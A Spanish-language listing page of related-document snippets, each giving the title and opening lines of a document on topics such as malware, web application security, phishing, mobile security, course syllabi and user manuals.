Novedades ebd versión 3.2 Novedades ebd versión 3.2 En este documento se detallan los cambios más importantes realizados en la versión 3.2 de ebd. Además de estas modificaciones, se han implementado mejoras de rendimiento y corregido

Más detalles

ECBTI/Sur/Herramientas Teleinformáticas-221120. Malware. Hernando Arbey Robles Puentes. Neiva, 8 de Septiembre de 2014

ECBTI/Sur/Herramientas Teleinformáticas-221120. Malware. Hernando Arbey Robles Puentes. Neiva, 8 de Septiembre de 2014 ECBTI/Sur/Herramientas Teleinformáticas-221120 Malware Hernando Arbey Robles Puentes Neiva, 8 de Septiembre de 2014 Malvare Definición: Es un software malicioso creado con la intención de introducirse

Más detalles

TECNOLÓGICO NACIONAL DE MÉXICO Instituto Tecnológico De Tijuana SEMESTRE 1 ENERO-JUNIO 2015 4TI1A. UNIDAD 5.

TECNOLÓGICO NACIONAL DE MÉXICO Instituto Tecnológico De Tijuana SEMESTRE 1 ENERO-JUNIO 2015 4TI1A. UNIDAD 5. TECNOLÓGICO NACIONAL DE MÉXICO Instituto Tecnológico De Tijuana SEMESTRE 1 ENERO-JUNIO 2015 CARRERA: INGENIERÍA EN TECNOLOGÍAS DE LA INFORMACIÓN Y COMUNICACIÓN 4TI1A. INTRODUCCIÓN A LAS TICS UNIDAD 5.

Más detalles

Botnet. Gusanos. Las diez amenazas más peligrosas de Internet. Consejos para prevenir la amenaza: Mantener las actualizaciones

Botnet. Gusanos. Las diez amenazas más peligrosas de Internet. Consejos para prevenir la amenaza: Mantener las actualizaciones Conocé las amenazas más peligrosas que actualmente existen en Internet. En esta guía podrán conocer y aprender junto a los chicos qué riesgos hay en la web y como prevenirlos Las diez amenazas más Botnet

Más detalles

CONDICIONES DE USO DEL SITIO WEB

CONDICIONES DE USO DEL SITIO WEB 1. INFORMACIÓN GENERAL CONDICIONES DE USO DEL SITIO WEB Las condiciones siguientes regulan la información y el uso permitido del sitio web con URL http://www.controlintegral.net (desde ahora el Web ),

Más detalles

EL SOFTWARE MALICIOSO MALWARE

EL SOFTWARE MALICIOSO MALWARE Página 1 de 5 Si usted no puede visualizar correctamente este mensaje, presione aquí Medellín, 21 de mayo de 2009 Boletín técnico de INDISA S.A. No. 71 EL SOFTWARE MALICIOSO MALWARE Autor: Omar Calvo Analista

Más detalles

Seguridad en Aplicaciones Web

Seguridad en Aplicaciones Web Seguridad en Aplicaciones Web Fabian Portantier Consultor en Seguridad Informática Instructor y Escritor sobre el tema Coordinador de la Carrera de Seguridad www.portantier.com Aplicaciones Web Actuales

Más detalles

La gestión del riesgo digital: conocimiento y mitigación

La gestión del riesgo digital: conocimiento y mitigación : conocimiento y mitigación Andrés García Ortega Banco Santander Madrid, 14 de Marzo de 2012 Conceptos 2 Transformación de los Riesgos Operacionales y como se manifiestan, afectados por los cambios y la

Más detalles

Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable

Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable 1. Introducción. El Sistema de Administración de Información de un Negocio Franquiciable (SAINF)

Más detalles

Redes sociales utilizadas para propagar malware

Redes sociales utilizadas para propagar malware Redes sociales utilizadas para propagar malware Autor: Cristian Borghello, Technical & Educational Manager de ESET para Latinoamérica Fecha: Lunes 28 de enero del 2008 ESET, LLC 610 West Ash Street, Suite

Más detalles

RESUMEN INFORMATIVO PROGRAMACIÓN DIDÁCTICA CURSO 2013/2014

RESUMEN INFORMATIVO PROGRAMACIÓN DIDÁCTICA CURSO 2013/2014 RESUMEN INFORMATIVO PROGRAMACIÓN DIDÁCTICA CURSO 2013/2014 FAMILIA PROFESIONAL: INFORMATICA Y COMUNICACIONES MATERIA: 28. DESARROLLO WEB EN ENTORNO SERVIDOR CURSO: 2º DE CFGS DESARROLLO DE APLICACIONES

Más detalles

Recomendaciones de Seguridad Red Social Twitter

Recomendaciones de Seguridad Red Social Twitter Recomendaciones de Seguridad Red Social Twitter Medidas de seguridad para Twitter Tras varios ataques a cuentas de reconocidas empresas, Twitter anunció nuevas medidas de seguridad. Cualquier usuario que

Más detalles

Quienes somos. Eduardo Arriols (@_Hykeos) Roberto Lopez (@leurian)

Quienes somos. Eduardo Arriols (@_Hykeos) Roberto Lopez (@leurian) CON Quienes somos Eduardo Arriols (@_Hykeos) Roberto Lopez (@leurian) Estudiantes de Ing. Informática en la EPS de la UAM y apasionados del mundo de la seguridad informática y el hacking. Fundadores del

Más detalles

Parte 3 - Consultas SQL + Servicios Web + Índices

Parte 3 - Consultas SQL + Servicios Web + Índices Parte 3 - Consultas SQL + Servicios Web + Índices 12450 Estructuras de Datos y de la Información 2 Prácticas Laboratorio - Curso 2008-2009 3.1 Consultas SQL: Ernesto Arroyo Jesús Bisbal Philippe Roussel

Más detalles

DISEÑO Y DESARROLLO DE PÁGINA WEB

DISEÑO Y DESARROLLO DE PÁGINA WEB DISEÑO Y DESARROLLO DE PÁGINA WEB TOTAL HORAS: 200 HORAS (100 PRESENCIALES 100 INVESTIGACIÓN) TOTAL CICLO: 16 SÁBADOS INTRODUCCIÓN En este Diplomado se establecen las bases y el método de trabajo necesario

Más detalles

SEGURIDAD INFORMÁTICA 2º SISTEMAS MICROINFORMÁTICOS Y REDES 1. CONTENIDOS MÍNIMOS PARA LA EVALUACIÓN POSITIVA

SEGURIDAD INFORMÁTICA 2º SISTEMAS MICROINFORMÁTICOS Y REDES 1. CONTENIDOS MÍNIMOS PARA LA EVALUACIÓN POSITIVA 2ª evaluación 1ª evaluación DEPARTAMENTO MATERIA CURSO INFORMÁTICA SEGURIDAD INFORMÁTICA 2º SISTEMAS MICROINFORMÁTICOS Y REDES 1. CONTENIDOS MÍNIMOS PARA LA EVALUACIÓN POSITIVA - Conocer las diferencias

Más detalles

Seguridad. Estos son algunos de los elementos de alta tecnología que BANCOLOMBIA utiliza para garantizar la seguridad en sus transacciones:

Seguridad. Estos son algunos de los elementos de alta tecnología que BANCOLOMBIA utiliza para garantizar la seguridad en sus transacciones: Seguridad Su información está segura en BANCOLOMBIA En BANCOLOMBIA nos hemos propuesto asegurar la confidencialidad, disponibilidad e integridad de la información, uno de nuestros recursos más valiosos.

Más detalles

Ataques más comunes. Virginia Armas Alejandro Do Nascimiento

Ataques más comunes. Virginia Armas Alejandro Do Nascimiento Ataques más comunes Virginia Armas Alejandro Do Nascimiento 1 Introducción Los ataques a desarrollar en la exposición son: HTTP Tunneling Suplantación de contenido Local File Inclusion Remote File Inclusion

Más detalles

WORKSHOP PATAGONIA 2009

WORKSHOP PATAGONIA 2009 WORKSHOP PATAGONIA 2009 by Cvila Malware (código_malicioso) está definido tradicionalmente como cualquier archivo que causa daño a una computadora, servidor o red. Actualmente debemos agregar a la lista:

Más detalles

Agenda. OWASP Seguridad Para Móviles. Introducción Riesgos más comunes Vulnerabilidades más comunes Mejores Prácticas Recomendaciones & Conclusiones

Agenda. OWASP Seguridad Para Móviles. Introducción Riesgos más comunes Vulnerabilidades más comunes Mejores Prácticas Recomendaciones & Conclusiones Copyright The Foundation 11 Nov. 2011 Seguridad Para Móviles Alexandro Fernandez Security Consultant Sm4rt Security Services alexandro@sm4rt.com 55 3520 1675 Agenda Introducción Riesgos más comunes Vulnerabilidades

Más detalles

Dulce M. Vázquez Caro

Dulce M. Vázquez Caro Dulce M. Vázquez Caro NOD 32 proporciona 10 recomendaciones básicas 1. No ingresar a enlaces sospechosos Evite hacer clic en hipervínculos o enlaces de procedencia dudosa para prevenir el acceso a páginas

Más detalles

Seguridad en Informática Aspectos Duros y Blandos. Dr. José Fernández G.

Seguridad en Informática Aspectos Duros y Blandos. Dr. José Fernández G. Seguridad en Informática Aspectos Duros y Blandos Dr. José Fernández G. Octubre 2013 Agenda Definición de Seguridad Informática. Objetivos del Área de Seguridad Informática. Amenazas y sus distintos tipos.

Más detalles

Análisis de un ataque de malware basado en web. Autor: Jorge Mieres E-Mail: jorge.mieres.ef#gmail.com www.evilfingers.com (febrero de 2009)

Análisis de un ataque de malware basado en web. Autor: Jorge Mieres E-Mail: jorge.mieres.ef#gmail.com www.evilfingers.com (febrero de 2009) Análisis de un ataque de malware basado en web Autor: Jorge Mieres E-Mail: jorge.mieres.ef#gmail.com www.evilfingers.com (febrero de 2009) White Paper Introducción Internet se ha transformado en una aliada

Más detalles

DESARROLLO WEB EN ENTORNO CLIENTE

DESARROLLO WEB EN ENTORNO CLIENTE DESARROLLO WEB EN ENTORNO CLIENTE CAPÍTULO 1: Selección de arquitecturas y herramientas de programación Juan Manuel Vara Mesa Marcos López Sanz David Granada Emanuel Irrazábal Jesús Javier Jiménez Hernández

Más detalles

Firmar Solicitud. Manual de usuario

Firmar Solicitud. Manual de usuario Firmar Solicitud Manual de usuario Madrid, Marzo de 2014 ÍNDICE 1. INTRODUCCIÓN... 3 2. PANTALLAS... 4 2.1. Login... 4 2.2. Ayuda... 4 2.3. Pantalla de Solicitudes de Registro... 5 2.4. Listado de documentos

Más detalles

Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica

Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica DANIEL FIRVIDA PEREIRA Técnico de seguridad - INTECO-CERT 23 de Noviembre 1º ENCUENTRO NACIONAL DE LA INDUSTRIA DE SEGURIDAD

Más detalles

Intercambio de ficheros institucionales

Intercambio de ficheros institucionales Intercambio de ficheros institucionales Unidad de Infraestructuras Junio 2013 Versión: 1.0 INDICE 1. INTRODUCCIÓN... 4 2. INICIO DEL CLIENTE DE INTERCAMBIO DE FICHEROS INSTITUCIONALES... 5 3. VISTA GENERAL

Más detalles

SEGURIDAD EN INTERNET. MALWARE

SEGURIDAD EN INTERNET. MALWARE 1 SEGURIDAD EN INTERNET. MALWARE En Internet, como en casi todos los ámbitos de la vida, la seguridad, entendida tal cual se recoge en la Real Academia de la Lengua, es prácticamente imposible de conseguir;

Más detalles

Scripting en el cliente: Javascript. Tecnologías Web

Scripting en el cliente: Javascript. Tecnologías Web Scripting en el cliente: Javascript Tecnologías Web Motivación Por qué usar JavaScript? Permite crear efectos atractivos visualmente Permite crear sitios WEB que se visualicen de la misma manera en distintos

Más detalles

Vulnerabilidad de Phishing en Sitios Bancarios en Argentina

Vulnerabilidad de Phishing en Sitios Bancarios en Argentina Vulnerabilidad de Phishing en Sitios Bancarios en Argentina La creciente aceptación de nuevas tecnologías en el campo de las comunicaciones y, en particular, el explosivo crecimiento de Internet a nivel

Más detalles